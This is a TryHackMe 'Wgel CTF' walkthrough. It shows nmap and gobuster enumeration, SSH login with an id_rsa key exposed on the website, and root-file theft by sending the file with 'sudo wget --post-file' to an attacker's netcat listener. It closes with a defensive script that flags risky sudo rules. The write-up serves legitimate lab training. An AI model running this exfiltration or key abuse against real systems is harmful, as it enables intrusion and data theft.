TryHackMe: Wgel CTF

0xNehru
3 min read · May 21, 2021

Nmap (Network Mapper)

The first thing we do is a general Nmap (Network Mapper) scan to find out how many ports are open.

# nmap -sT -vv -sC -sV <ip>

HTTP

Summary of the Nmap output:

Two ports are open: 22 and 80. Port 22 is SSH, so we know we can connect over SSH once we have credentials. Port 80 is HTTP, which means the box is hosting a website, so let's open that IP in a browser.

Gobuster

It looks like an Apache2 server, so the next idea is to brute-force the website for directories and files with some common extensions. The tool for that is gobuster.

Command: gobuster dir -u <site URL> -w <word list> -x <extensions>

root@:~# gobuster dir -u http://10.10.116.173/ -w /usr/share/wordlists/dirb/common.txt -t 25 -x php,html,txt -q
/index.html (Status: 200)
/index.html (Status: 200)
/server-status (Status: 403)
/sitemap (Status: 301)

Here we found a directory at /sitemap, so I opened it in the browser and checked it.

Let's see whether there is anything further inside that directory.

root@:~# gobuster dir -u http://10.10.116.173/sitemap/ -w /usr/share/wordlists/dirb/common.txt -t 25 -x php,html,txt -q
/.ssh (Status: 301)
/about.html (Status: 200)
/blog.html (Status: 200)
/contact.html (Status: 200)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/js (Status: 301)
/services.html (Status: 200)
/shop.html (Status: 200)
/work.html (Status: 200)

Yes! We found a .ssh directory. I opened it and found an id_rsa file, which is interesting: a private key sitting in the web root.

Here is the id_rsa key:

Remember from the start that an SSH connection is possible on port 22. Checking the source code of the first web page, we also find a username: jessie.

user_flag.txt

Make sure to give the id_rsa file the proper permissions, otherwise SSH will refuse to use it:

# chmod 600 id_rsa

Then run this to connect:

# ssh -i id_rsa jessie@<ipaddress>

root_flag.txt

For privilege escalation, the first thing to check is sudo -l, which lists what the user can run with sudo. It showed that wget can be run as root without a password. That alone doesn't give us a root shell, so the idea is to abuse wget itself to read the root flag. First, start a listener on the attacking machine:

# nc -lvnp 4444

(on my machine, i.e. the attacker's machine)

Let's check GTFOBins for wget: https://gtfobins.github.io/gtfobins/wget/

Command: sudo /usr/bin/wget --post-file=/root/root_flag.txt http://<Tunnel IP>:4444

wget runs as root, reads the flag file, and POSTs its contents to our listener. Back on the netcat side:

# nc -lvnp 4444

The root flag shows up in the POST body:
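The whole root step hinges on that one sudo -l line: a NOPASSWD entry for a binary that can read and send arbitrary files. As an added example (not part of the original writeup), here is a small audit script that parses sudo -l output and flags exactly that kind of entry; the sample output and hostname are constructed to match the shape of what the box shows for jessie.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed sample of `sudo -l` output (hostname made up); the
# wget NOPASSWD entry is the one this room turns on.
SAMPLE_SUDO_L = """\
Matching Defaults entries for jessie on example-host:
    env_reset, mail_badpass, secure_path=/usr/sbin:/usr/bin:/sbin:/bin

User jessie may run the following commands on example-host:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget
"""

# Binaries that, run as root with no password, can read or upload
# arbitrary files (wget --post-file is the case used in this room).
FILE_TRANSFER_BINS = {"wget", "curl"}

@dataclass
class SudoRule:
    runas: str
    nopasswd: bool
    command: str

# "(runas) TAG: TAG: cmd1, cmd2" -> runas, tag run, command list
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")

def parse_sudo_l(text: str) -> list[SudoRule]:
    """Parse the 'may run the following commands' section of `sudo -l`."""
    rules: list[SudoRule] = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True          # everything after this header is a rule
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        runas, tags, cmds = m.groups()
        for cmd in cmds.split(","):
            rules.append(SudoRule(runas.strip(), "NOPASSWD:" in tags, cmd.strip()))
    return rules

def risky_rules(rules: list[SudoRule]) -> list[SudoRule]:
    """NOPASSWD rules whose command is a known file-transfer binary."""
    return [r for r in rules
            if r.nopasswd and r.command.split()[0].rsplit("/", 1)[-1] in FILE_TRANSFER_BINS]

if __name__ == "__main__":
    for r in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"risky: ({r.runas}) NOPASSWD: {r.command}")
```

Feed it the real output of sudo -l on a host you administer and every flagged line is a sudoers entry worth removing or restricting.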
